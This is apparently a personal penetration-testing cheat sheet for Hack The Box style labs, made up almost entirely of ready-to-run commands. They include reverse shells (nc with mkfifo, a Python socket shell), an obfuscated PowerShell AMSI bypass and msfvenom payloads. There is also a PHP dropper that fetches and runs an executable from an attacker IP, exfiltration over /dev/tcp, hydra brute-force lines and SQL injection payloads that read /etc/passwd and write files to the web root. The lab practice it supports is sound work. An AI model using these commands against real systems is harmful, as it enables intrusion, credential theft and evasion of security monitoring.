Some of the commands/tools I often use when doing machines on HTB and similar platforms
- Scan
- Enumeration
- Bruteforce
- Linux Privilege Escalation
- Utilities
- Reverse Shells
- Services
- Tools
- Wordlists
- Miscellaneous
- Tunneling
- Web Exploitation
- Windows Enumeration and Privilege Escalation
sudo nmap -p- -sV -sC -oA nmap.out $IP --min-rate=5000nmap -sV -sC $IP -oN basic_scan.nmapnmap -sC -sV -p22,80 -Pn -oN nmap $IPsudo nmap -p22,80 -sV -sC -A -oN scan/open-tcp-ports.txt -sT $ipsudo rustscan -u 6500 -b 3000 -a $IP -sC -sV -oN scan.txtgobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u <URL>gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt -o output.txtgobuster dir -e -t50 -q -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <URL>gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u <URL> -o gobuster.outffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u <URL>/FUZZferoxbuster -u <URL> --force-recusrion -C 404 -m GET,POST ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL>ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.DOMAIN" -u <URL>ffuf -u <URL>/FUZZ -X POST -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc all -fs 50- filter by size
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL> -fs {size}hydra -l $user -P /usr/share/wordlists/rockyou.txt -f $IP http-get /adminhydra -t 1 -V -f -l $user -P /usr/share/wordlists/rockyou.txt $ip smbhydra -l $user -P list.txt $ip ftphydra -l admin -P /usr/share/wordlists/rockyou.txt <URL> http-post-form "/admin/:user=admin&pass=^PASS^:Username or password invalid"hydra -L usernames_list.txt -P passwords_list.txt pop3://<ip>hydra -L usernames_list.txt -P $password <ip> -V http-form-post '/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'hydra -l <username> -P <passwords.txt> <ip> -V http-form-post "/wp-login:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30wpscan -v -U $wordlist -P $wordlist --url <URL/wp-login.php>ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <URL> -mr "username already exists"hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<ip>for i in $(seq 900 1000); do curl $IP:<port>/?page=../../../../proc/$i/cmdline -o -; echo "PID => $i"; doneffuf -c -u '<http://<ip>:<port>/otp-auth>' -H 'Content-Type: application/json' -X POST -d '{"otp":"FUZZ"}' -fr '{"success": "false"}' -w digits.txt -od outputwhere digits.txt is a file with all 4-digit pins and output is an empty dir
cat /etc/crontabgetcap -r / 2>/dev/nulldoas -u root /bin/bashnetstat -antnetstat -tulpennetstat -an -p tcpss -tlpimport pdb—> we can execute any code in the debugger
echo '/bin/bash' > systemctl
chmod +x systemctl
export PATH=.:$PATHsudo ifconfig tun0 mtu 1200on the victim machine
cat $file > /dev/tcp/<attacker ip>/<port>on the attacker machine
nc -nlvp <port> > filenamefind / -type f -group users 2>/dev/nullfind / -user root -perm -4000 -print 2>/dev/nullRules file
/etc/john/john.confexample rule
[List.Rules:$name]
Az"[0-9][0-9]"gpg --import private.keygpg --decrypt fragment.ascrm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/fpython3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'https://github.com/pentestmonkey/php-reverse-shell
https://highon.coffee/blog/reverse-shell-cheat-sheet/
<?php
$data = file_get_contents('<http://10.10.14.20:8000/xc.exe>');
file_put_contents('C:\\\\programdata\\\\xc_10.10.14.20_9001.exe' . $data);
system("C:\\\\programdata\\\\xc_10.10.14.20_9001.exe");
?>./xc -l -p 9001https://github.com/seriotonctf/shellcat
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )https://github.com/Xyan1d3/SharpEvader
python3 sharpevader.py -p windows/x64/meterpreter/reverse_tcp -lh tun0 -lp 9001msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx -o exploit.aspxmsfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "\x00\x25\x26" -f python -v shellcodesmbclient -L //<IP>smbclient //$IP/$sharesmbclient -U $user \\\\$ip\\$sharesmb: \\> recurse ON
smb: \\> prompt OFF
smb: \\> mget *run on attacker machine
smbserver.py share . -smb2supportrun on target machine
copy <filename> \\\\<IP>\\share\\<ftp://$user:$password@$domain> or $ip
example:
?u=ftp://user:heightofsecurity123!@forge.htblcd ftpscp -P22 user@IP:filename .scp $filename $user@$IP:.scp -r $user@$IP:/var/www/html .hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://$IPhydra -l <username> -P <wordlist> $IP -t 4 sshgrab your SSH key and add it to the authorized_keys file inside the .ssh folder in the target machine
ssh-keygen -f mykeyssh <USER>@<IP> -L <LOCAL PORT>:127.0.0.1:<LOCAL PORT>xfreerdp /u:$user /d:WORKGROUP /p:$pass /v:$ipwpscan --api-token '$your_token_here' --url $URL -U $user -P $password [ or password list ] wpscan --url $URL -e ap,uNon-Interactive command
mysql -u $user -p '$pass' -D $database -e '$command;'snmpwalk -v 2c -c public $IPget telnet password using snmp
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0Ref : http://www.irongeek.com/i.php?page=security/networkprinterhacking
docker pull [image name]docker run [image name]docker inspect [image name]docker run -it [image]docker history [image]docker history --no-trunc [image]docker save [image] -o layers.tarTo see previous commits
git showGet most recent commits -1
git diff HEAD~1sudo mount -t nfs <IP>: ./tmpredis-cli -h <IP> -a '$secret'KEYS *LRANGE authlist 1 100mongoshow dbsshow tablesdb.$table_name.find()Bruteforce login using hydra and msfconsole
- hydra
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<IP>- Using Metasploit
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts <rhost>
msf6 auxiliary(scanner/vnc/vnc_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/vnc/vnc_login) > runInteract with VNC
vncviewer <IP>rsync -av --list-only rsync://<IP>/<sharename> rsync -av rsync://<IP>/<sharename> <destnation folder>rsync <filename> rsync://sys-internal@<IP>/files/sys-internal/.ssh- lse.sh: https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
- linpeas.sh: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
- winpeas.exe: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
- pspy64: https://github.com/DominicBreuker/pspy/releases
searchsploit -m php/webapps/49876.py [module name]https://github.com/micahvandeusen/gMSADumper
https://github.com/hemp3l/sucrack
https://github.com/Flangvik/SharpCollection
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
- seclists : https://github.com/danielmiessler/SecLists
- rockyou.txt
cewl -w wordlists.cewl $website -d 3cat wordlist.cewl | tr '[:upper:]' '[:lower:]' >> wordlists.cewlcat wordlists.cewl | sort -u > sorted.lstpython2 -c 'import pty;pty.spawn("/bin/bash")'script /dev/null -c bashpython3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermCtrl + Zstty raw -echo; fgstty rows <rows> columns <cols>https://github.com/jpillora/chisel
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
Used here : https://0xdf.gitlab.io/2022/05/03/htb-antique.html
python3 -m http.servercd /tmp
wget $ip/chisel_1.7.7_linux_amd64
chmod +x chiselI’ll run the binary in server mode on my box:
./chisel_1.7.7_linux_amd64 server -p <port> --reverseNow I’ll connect with chisel from the container:
./chisel_1.7.7_linux_amd64 client $my_ip:<port> R:<port to forward>:<target ip>:<port to forward>forwarding port 5985 from the docker container
- my machine
./chisel server -p 5000 --reverse- target machine
./chisel client <tun0 ip>:<port> R:<port to forward>:<target ip>:<port to forward>.\chisel.exe client <ip>:<local port to listen on> R:<first port to forward>:localhost:<first port to forward> R:<second port to forward>:localhost:<second port to forward>./socat tcp-listen:8001,reuseaddr,fork tcp:localhost:8000export http_proxy=127.0.0.1:8080' UNION SELECT 1,table_name from information_schema.tables where table_schema='webapp'-- -' UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_schema='webapp' and table_name='queue' -- -' UNION SELECT 1,'serioton' INTO OUTFILE '/var/www/html/test.html' -- -' UNION SELECT 1,load_file('/etc/passwd') -- -The script below looks for Win32 services on the host with unquoted service paths, not in the Windows folder.
Get-WmiObject -Class Win32_Service | Where-Object { $*.PathName -inotmatch “`”” -and $*.PathName -inotmatch “:\\\\Windows\\\\” }| Select Name,Pathname- check for user privileges
whoami /priv- powershell history file
APPDATA\\roaming\\microsoft\\windows\\powershell`\\psreadline\\ConsoleHost_History.txt- check for specific user info
net user $username- Get the LAPS passwords
Get-ADComputer -Filter * -Properties *crackmapexec winrm <ip> -u <username> -p <password>evil-winrm -i <ip> -u <username> -p <password>- bloodhound python
bloodhound-python -c all -u <username> -p <password> -d <domain> -dc <dc> -ns <ip> --disable-pooling -w1 --dns-timeout 30- first start neo4j
sudo neo4j console- then start bloodhound
bloodhound